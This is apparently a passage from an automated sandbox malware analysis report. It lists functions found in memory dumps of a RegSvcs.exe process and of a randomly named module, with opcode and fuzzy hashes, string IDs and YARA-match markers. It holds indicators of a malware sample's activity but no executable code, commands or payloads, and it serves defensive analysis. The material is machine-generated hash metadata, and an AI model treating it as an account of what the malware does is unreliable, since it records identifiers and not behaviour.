                                                        • Instruction ID: ee47a541df71e68b2ed4cf0f05915a4c43387006e6884d67fab37c4dcb0e0a31
                                                        • Opcode Fuzzy Hash: aab681df7933971758d100d30455cb0f3408d4f116338b0e886858d2380cf3fa
                                                        • Instruction Fuzzy Hash: FF518B7190C20697DB6DB62CD90136E7FA5EB40F10F10CD68E4E687299EB35C4D5874B
                                                        Function 01134C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$Flst
                                                        • API String ID: 0-758220159
                                                        • Opcode ID: b9d63051fb26a3ffc6a32e3d1b76b28ebc949b13238aa9eeb5483776031ac69f
                                                        • Instruction ID: fd735df6cee7ce829278b98b7d8e45522b0c246403f0d4fdd9d4bf16394d3796
                                                        • Opcode Fuzzy Hash: b9d63051fb26a3ffc6a32e3d1b76b28ebc949b13238aa9eeb5483776031ac69f
                                                        • Instruction Fuzzy Hash: 53518CB1E00208CBDF2ACF99C4886ADFBF4FF94758F15806ED0599B659E7709985CB80
                                                        Function 0118CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0118CFBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: CallFilterFunc@8
                                                        • String ID: @$@4_w@4_w
                                                        • API String ID: 4062629308-713214301
                                                        • Opcode ID: 2d9f8c87b6c3f7880e0b81e5600213041fcbcbf2873fd7cfeb49720a5799158e
                                                        • Instruction ID: bde9166e94ce92d89b954fd46cb52400de73dfb2cd5314d9a2e15255a1034774
                                                        • Opcode Fuzzy Hash: 2d9f8c87b6c3f7880e0b81e5600213041fcbcbf2873fd7cfeb49720a5799158e
                                                        • Instruction Fuzzy Hash: 2841A371900215DFDB29AF99D840AADFBB4FF55B14F10812EE915EB254D730D841CF61
                                                        Function 0117FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $
                                                        • API String ID: 3446177414-3993045852
                                                        • Opcode ID: 810d5547340f38d3c6cce304e1bcb0a64fe87f1e3fd505697327cc539ae233c6
                                                        • Instruction ID: cd45586088b6fcaec167842abf345d691148b5d455620f4aace6bf204f90262c
                                                        • Opcode Fuzzy Hash: 810d5547340f38d3c6cce304e1bcb0a64fe87f1e3fd505697327cc539ae233c6
                                                        • Instruction Fuzzy Hash: 5241B175A0021AAFCF19DF99C840AEEBFB5FF48714F150129E920A7341CB709952CB90
                                                        Function 010FDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0$0
                                                        • API String ID: 3446177414-203156872
                                                        • Opcode ID: 0fabfcdf30b8e617cbbbb3c4c27738cfdb8a2e56053cb8c095f6cf9b489c3456
                                                        • Instruction ID: 7955af8842ae20743e979b071bc2f2eb430d254e7afc7b5fbabb44622bc11f50
                                                        • Opcode Fuzzy Hash: 0fabfcdf30b8e617cbbbb3c4c27738cfdb8a2e56053cb8c095f6cf9b489c3456
                                                        • Instruction Fuzzy Hash: 5F417EB16087069FC350CF28C484A1ABBE5BF88318F04496EFA88DB751D771E949CB96

                                                        Executed Functions

                                                        Function 03E3EDF1 Relevance: .1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e598f3f36ec331bfcf8b6dfa3c543ecee01a5bd71a7b9c3ed8fade679c12db22
                                                        • Instruction ID: a40848f8e9f3dcd2fc76fcffaaf0ebf9f359e9fc094c8a308be4c2fc1f51ef53
                                                        • Opcode Fuzzy Hash: e598f3f36ec331bfcf8b6dfa3c543ecee01a5bd71a7b9c3ed8fade679c12db22
                                                        • Instruction Fuzzy Hash: FA316212A597F14ED31E836D08BD675AFD18E9720174EC2EEDADA6F2E3C4848408D3A5
                                                        Function 03E3E792 Relevance: 19.1, Strings: 15, Instructions: 367COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "E$+'$/N$0Y$1$^$kF$lS$n$q5$s$s3$sA$x$}
                                                        • API String ID: 0-235565663
                                                        • Opcode ID: 7ca86aedeb5ccba312a10008225c47f3f4e1f32658f7bc6b88531a97fac96fbe
                                                        • Instruction ID: be2999fd715df127cedd60a12c0fd4f6b6e9a4c2659fe613695d51c242fdb595
                                                        • Opcode Fuzzy Hash: 7ca86aedeb5ccba312a10008225c47f3f4e1f32658f7bc6b88531a97fac96fbe
                                                        • Instruction Fuzzy Hash: A31212B1D05259CFDB24CF94C888BEDBBB2FF85308F248299D0196B285C7745A85CF90
                                                        Function 03E3817B Relevance: .2, Instructions: 164COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6527bf7e447f56c7733b8d7ffc6450dcbdb0d93032ed51231632c491ba2986eb
                                                        • Instruction ID: 36d030d2f3a905a24e6c9be5bd241ea568447716c371378a19bac387f33916a9
                                                        • Opcode Fuzzy Hash: 6527bf7e447f56c7733b8d7ffc6450dcbdb0d93032ed51231632c491ba2986eb
                                                        • Instruction Fuzzy Hash: 3C515FB2D10219AFDB14CF99DC84AEEBBB8EF49710F10525AF918E7240E7719644CBA4
                                                        Function 03E4C056 Relevance: .2, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98e743ced41e44f72f40d1d82b7a42c2365ce7277c3d6f2d090afe5612063a5e
                                                        • Instruction ID: 36588e90ed094536ff7ec2faaf60c25c38bff2e4867b43b6c8a9e9433ab7496f
                                                        • Opcode Fuzzy Hash: 98e743ced41e44f72f40d1d82b7a42c2365ce7277c3d6f2d090afe5612063a5e
                                                        • Instruction Fuzzy Hash: 7251B476D01218ABDB20DFD4EC85EEEB378EF84315F145399ED08AB110EBB15A448BE1
                                                        Function 03E55163 Relevance: .1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: facff36bac20a40476b83381cfdba76ae00315a6540dfc5924ecdebb21404268
                                                        • Instruction ID: a5bbe6e9f7c81cc368ebaf9b4da3828bf5c0b510508a2b994fa8e2b7e3efa495
                                                        • Opcode Fuzzy Hash: facff36bac20a40476b83381cfdba76ae00315a6540dfc5924ecdebb21404268
                                                        • Instruction Fuzzy Hash: 9B213873A41604AFE720EAAC9CC5BBDF328EB57624F2803DAFC558F181E21159128396
                                                        Function 03E5CB46 Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6954a07cf51ee32ffabec0de7e03d8d7c8ebf024467dd5cb3eb3a68123d3096f
                                                        • Instruction ID: ee2174ebc88f7dda37af42ab8497221dccf582acfa607118936f4a31dff00bc3
                                                        • Opcode Fuzzy Hash: 6954a07cf51ee32ffabec0de7e03d8d7c8ebf024467dd5cb3eb3a68123d3096f
                                                        • Instruction Fuzzy Hash: 3B31C8B5A00649ABCB14DF98DC80EEFB7B9EF89714F108219FD19A7340D630A911CBA1
                                                        Function 03E5C3E6 Relevance: .1, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c1bc7b98f3cac180a310fdab1fe458d2edb1ab5dbe0128017f8d26d77587b83e
                                                        • Instruction ID: e4de81e0cb40425aaf9d8392f725605c72f8c5673d4f64fbed8cc8d532a8eed7
                                                        • Opcode Fuzzy Hash: c1bc7b98f3cac180a310fdab1fe458d2edb1ab5dbe0128017f8d26d77587b83e
                                                        • Instruction Fuzzy Hash: FE31EBB5A00649ABCB14DF98CC81EEFB7F9EF89700F104219FD19A7240D731A911CBA1
                                                        Function 03E5CD76 Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 33f8c7f0e3e44ad936f1e5a515331db3fbd54e5ec803f734449e3cd12e084282
                                                        • Instruction ID: 2efa166941ef877b0224c4669c7066fbf27f6144b3268ae35e0abb4ba3c199f0
                                                        • Opcode Fuzzy Hash: 33f8c7f0e3e44ad936f1e5a515331db3fbd54e5ec803f734449e3cd12e084282
                                                        • Instruction Fuzzy Hash: 3A212AB5A00709AFDB14DF98DC45EEFB7B9EF89300F104209FD18AB240E670A911CBA1
                                                        Function 03E4BED6 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dfcba41d613d1ee06c8d837bf5c4b721df64d3948ecb0593dd1bf464883540ad
                                                        • Instruction ID: b52551a26ce519434926233b63563a87b4fed10fe2c3d4867b803f3d49855ff3
                                                        • Opcode Fuzzy Hash: dfcba41d613d1ee06c8d837bf5c4b721df64d3948ecb0593dd1bf464883540ad
                                                        • Instruction Fuzzy Hash: C0115EB6380305BBF720EA559C42FAB776C9BC9B10F244115FF08AE2C0E6A5B91146B9
                                                        Function 03E5C1F6 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc502c4f5fb1e433182f100dabe449836ab8cf47dee8c561ec39fc118784460e
                                                        • Instruction ID: 1e37034d910876fc6a1d6d6f59e721cd941ad3be4b21b624ed9c04c52cdb0193
                                                        • Opcode Fuzzy Hash: bc502c4f5fb1e433182f100dabe449836ab8cf47dee8c561ec39fc118784460e
                                                        • Instruction Fuzzy Hash: CD115E75900719ABD720EBA8CC45FBF77ACEB85700F004649FE18AB280E6716911CBA1
                                                        Function 03E58DD6 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8f60e1143f0cf18d69a767f09dc82b32b9c9eb6971880ecabbece0b3c9dec2c
                                                        • Instruction ID: cf7c35813ec1066d2685cb523507742d5f680480a5c4b07a099713bc4971be8f
                                                        • Opcode Fuzzy Hash: b8f60e1143f0cf18d69a767f09dc82b32b9c9eb6971880ecabbece0b3c9dec2c
                                                        • Instruction Fuzzy Hash: 0521FEB6D01219AF8B00DFA9D8419EFB7F9EF89210F14426AE915E7240E7709A058BE1
                                                        Function 03E5C076 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb7fe2a1165a5df4f23ca3e0e9e5e3605d0f945e29dc6cd7cbf2f1e1337ac2ec
                                                        • Instruction ID: 15a2dc30a4019812e8951d92c681905b18acdd35ec7f784af46eea24bec4f1a0
                                                        • Opcode Fuzzy Hash: cb7fe2a1165a5df4f23ca3e0e9e5e3605d0f945e29dc6cd7cbf2f1e1337ac2ec
                                                        • Instruction Fuzzy Hash: A2115175900708ABD720EF58CC45FAFB7ACEB85710F004609FE18AB281E7716911CBA1
                                                        Function 03E5A116 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dcd8c2773a16934e789e38f2c48937d86e69540242533021738f2cb3c3523346
                                                        • Instruction ID: cdea2b906920ae851cf0e9dad3e730747e4fb64d8b899439b7c00ebec90fdcfb
                                                        • Opcode Fuzzy Hash: dcd8c2773a16934e789e38f2c48937d86e69540242533021738f2cb3c3523346
                                                        • Instruction Fuzzy Hash: A5110DB6D11219AFDB00DFA9DD409EEB7F9EF49210F14426AE919E7240E7709A018BE1
                                                        Function 03E59A26 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80bd1a155e0571c3f01f578515085df92b14367b599e6ffae8af3b5b12c150b0
                                                        • Instruction ID: 0cef50e4ad6ea5b14b3b5dd633b645f1db2cabf5096af6eaf7e4f749536f193a
                                                        • Opcode Fuzzy Hash: 80bd1a155e0571c3f01f578515085df92b14367b599e6ffae8af3b5b12c150b0
                                                        • Instruction Fuzzy Hash: 481124B6D1121CAFCB40DFE9D8409EEB7F9EF89210F04466AE919E7200E7705A05CBE1
                                                        Function 03E55604 Relevance: .1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d0ea34f049ab473d5adff18661b5c81b19df24f278c2665a480cac1bf91c6c4
                                                        • Instruction ID: 38f30559765304878d278b55627381d2e4c6290d7c91e9ee4bad7651dbed910c
                                                        • Opcode Fuzzy Hash: 0d0ea34f049ab473d5adff18661b5c81b19df24f278c2665a480cac1bf91c6c4
                                                        • Instruction Fuzzy Hash: BC01A1B6A403146BDB20EA64CC45DEB736CDF85210F100396FD18AB240FA706A518AE1
                                                        Function 03E5D0D6 Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 38d2feab983de85d1f3de29fa977a2bd23ee981695e62302d8997563981d3ca0
                                                        • Instruction ID: 4b5edcbda9c8816f3fc90ff044362286ad5cc8697ed64fa2120d44ab709fdded
                                                        • Opcode Fuzzy Hash: 38d2feab983de85d1f3de29fa977a2bd23ee981695e62302d8997563981d3ca0
                                                        • Instruction Fuzzy Hash: 0001D2B6214608BFCB54DE89DC90EDB77ADAF8D710F008208FA09E7241D630F851CBA4
                                                        Function 03E58D46 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d7cfce0cb669a1a5766cb90a86f61e5ad246272d7fcfa8adb1781d7509f01cad
                                                        • Instruction ID: 52f84772b1818c9a43f7feea1711d3543ca7f745858aad084eb447f05cdb9ef5
                                                        • Opcode Fuzzy Hash: d7cfce0cb669a1a5766cb90a86f61e5ad246272d7fcfa8adb1781d7509f01cad
                                                        • Instruction Fuzzy Hash: E601D7F6C11219AFCB40DFE8D9409EEBBF9EB48200F14466AE919F6240E7705A04CFA1
                                                        Function 03E381E5 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3453d2388d3d834db9ed9ad5b6b70e64ae3e0cc91eac934c6ea9a59afe079c2
                                                        • Instruction ID: 1017a2ce0044af2ade2a12cff6bba79b3934c56223d3df86891f37d1c1c14c2a
                                                        • Opcode Fuzzy Hash: b3453d2388d3d834db9ed9ad5b6b70e64ae3e0cc91eac934c6ea9a59afe079c2
                                                        • Instruction Fuzzy Hash: 1F0199B1D11229AF8B54CFADD88459EBBF8FB4D620B10865BE818E7200D7708641CFD5
                                                        Function 03E3832B Relevance: .0, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5971e00a51672799be65cf14070a0510b7f044360f612034379c37173df06278
                                                        • Instruction ID: dd02c6e2303965f9c3c5bb5eada34a0e34507884debe3f3bb82a81493f910ca3
                                                        • Opcode Fuzzy Hash: 5971e00a51672799be65cf14070a0510b7f044360f612034379c37173df06278
                                                        • Instruction Fuzzy Hash: 88F0B473A04212ABD7109E5DAC84B86F398EB8A320F241222F91C9B281E771E455C791
                                                        Function 03E5C2F6 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e65aab4c952ac6307af7ac83a422c709d1c2bdcc2863bfcf445573a813a40be3
                                                        • Instruction ID: 560e4365089c660b531f7a71812ae28793b94a9280ac77dce788a80eecd79c8f
                                                        • Opcode Fuzzy Hash: e65aab4c952ac6307af7ac83a422c709d1c2bdcc2863bfcf445573a813a40be3
                                                        • Instruction Fuzzy Hash: 0AF01CB5200209BBDB10EE99DC81E9B77ADEFC9710F004519FE18AB241D670B9218BB0
                                                        Function 03E4BFF6 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bace40e7bc14a1b411805135fdedcc8f10220c8b60a5b2d9116e086faab786e9
                                                        • Instruction ID: a7b2c5ec9bd7e725fb67168813705bd4cfdd31cba750a2d2de3e9f8477db824e
                                                        • Opcode Fuzzy Hash: bace40e7bc14a1b411805135fdedcc8f10220c8b60a5b2d9116e086faab786e9
                                                        • Instruction Fuzzy Hash: 78F01271815209EBDB14DF64E941BDEBBB8EB04320F2043A9E8299B2C0E63597549795
                                                        Function 03E5CFF6 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3f1279f4a085f3bf6d3186f45fcaa4273211a882ea4a374bdc05cd11e1aa4c80
                                                        • Instruction ID: 4c6c76dc4b032d1496107575136cf41150f9ae3be6f93c10328935d15d37891e
                                                        • Opcode Fuzzy Hash: 3f1279f4a085f3bf6d3186f45fcaa4273211a882ea4a374bdc05cd11e1aa4c80
                                                        • Instruction Fuzzy Hash: 51E06D766002057BCA10EE59DC41EDB33ADDFC9710F004418FA08A7241D670B81086B4
                                                        Function 03E5EE36 Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, Offset: 03C10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_3c10000_TsdBVAGjsKVoi.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 921b030c230440de0726696820ca5261c4a634c9c5d71502a68629f0eb4e272c
